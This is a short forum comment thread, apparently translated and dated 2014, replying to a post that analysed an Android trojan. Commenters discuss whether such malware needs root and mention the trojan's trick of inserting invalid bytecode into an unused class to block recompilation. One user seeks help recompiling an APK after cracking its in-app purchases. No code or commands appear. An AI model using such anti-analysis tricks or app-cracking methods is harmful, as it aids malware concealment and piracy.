Looks like trojans on Android will only get more numerous and better hidden.
A master is a master; I bow in admiration!
It seems all of today's phone viruses need root.
A question: sometimes I run into the problem mentioned in the post, where decompiling works but recompiling fails. How should that be handled?
We have witnessed the birth of another master! Thanks for your hard work, OP.
amscracker posted on 2014-8-8 20:08:
A master is a master; I bow in admiration!
Let's learn from each other.
358463121 posted on 2014-8-8 20:19:
It seems all of today's phone viruses need root.
Why? This one does not need it.
william2568 posted on 2014-8-8 20:19:
A question: sometimes I run into the problem mentioned in the post, where decompiling works but recompiling fails. How should that be handled?
There are many different cases; the technique this trojan uses is inserting invalid bytecode into an unused class, and I have not worked that one out yet.
zxcfvasd posted on 2014-8-8 23:01:
There are many different cases; the technique this trojan uses is inserting invalid bytecode into an unused class, and I have not worked that one out yet.
Thanks for the answer.
Sometimes when other people decompile, crack the in-app purchases and then recompile, the whole process goes smoothly.
I decompiled the same apk successfully, but recompiling it failed.
If invalid bytes had been inserted, I should not be the only one failing...
The message on failure is also just like the post says, something like exception in thread "main"...
Sorry for the long message; I hope an expert can give me some pointers.
Sorry for the trouble, and thanks again!